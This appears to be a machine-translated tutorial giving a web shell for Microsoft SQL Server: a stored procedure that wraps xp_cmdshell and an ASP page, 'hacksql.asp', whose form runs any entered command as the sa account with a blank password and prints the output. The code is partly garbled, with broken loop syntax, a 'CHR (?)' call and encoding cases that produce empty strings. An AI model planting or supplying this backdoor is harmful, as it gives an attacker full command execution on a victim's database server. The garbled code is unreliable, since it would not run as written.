program | Stored procedure 1, first in the SQL inside you can access the database to establish stored procedures, such as: Ddy
As follows:
CREATE PROCEDURE Ddy
@cmd varchar (50)
As
EXEC master.. xp_cmdshell @cmd
2, the ASP program is as follows: (hacksql.asp)
<%
Cmd=trim (Request.Form ("cmd"))
If cmd<> "" Then
Work ()
Else
Show ()
End If
function work ()
Set Conn=server. CreateObject ("Adodb.connection")
Set Rs=server. CreateObject ("Adodb.recordset")
Conn. Open "xx", "sa", ""
sql= "exec ddy '" &cmd& ""
Rs. Open Sql,conn
If not Rs. EOF Then
Do as not rs.eof
Response.Write "<pre>" &htmlencode2 (Trim (RS (0)) & "</pre>"
Rs. MoveNext
Loop
Else
Response.Write "No"
End If
If Rs. State=1 then Rs.close
Set rs=nothing
Conn. Close
Set conn=nothing
End Function
Function Show ()
%>
<form action=hacksql.asp method=post>
Please enter DOS command: <input type=text name=cmd>
<input type=submit value= "OK" >
</form>
<%
End Function
function Htmlencode2 (str) '--------conversion functions (more neat for display)
Dim result
Dim l
If IsNull (str) Then
Htmlencode2= ""
Exit function
End If
L=len (str)
Result= ""
Dim i
For i = 1 to L
Select Case Mid (str,i,1)
Case "<"
Result=result+ "<"
Case ">"
result=result+ ">"
Case Chr (34)
result=result+ "" "
Case "&"
result=result+ "&"
Case Chr (13)
result=result+ "<br>"
Case Chr (9)
Result=result+ ""
Case "'"
result=result+ "'"
Case Chr (32)
Result=result+ ""
If I+1<=l and i-1>0 then
If Mid (str,i+1,1) =CHR or mid (str,i+1,1) =CHR (9) or mid (str,i-1,1) =CHR (?) or mid (str,i-1,1) =CHR (9) Then
Result=result+ ""
Else
Result=result+ ""
End If
Else
Result=result+ ""
End If
Case Else
Result=result+mid (str,i,1)
End Select
Next
Htmlencode2=result
End Function
%>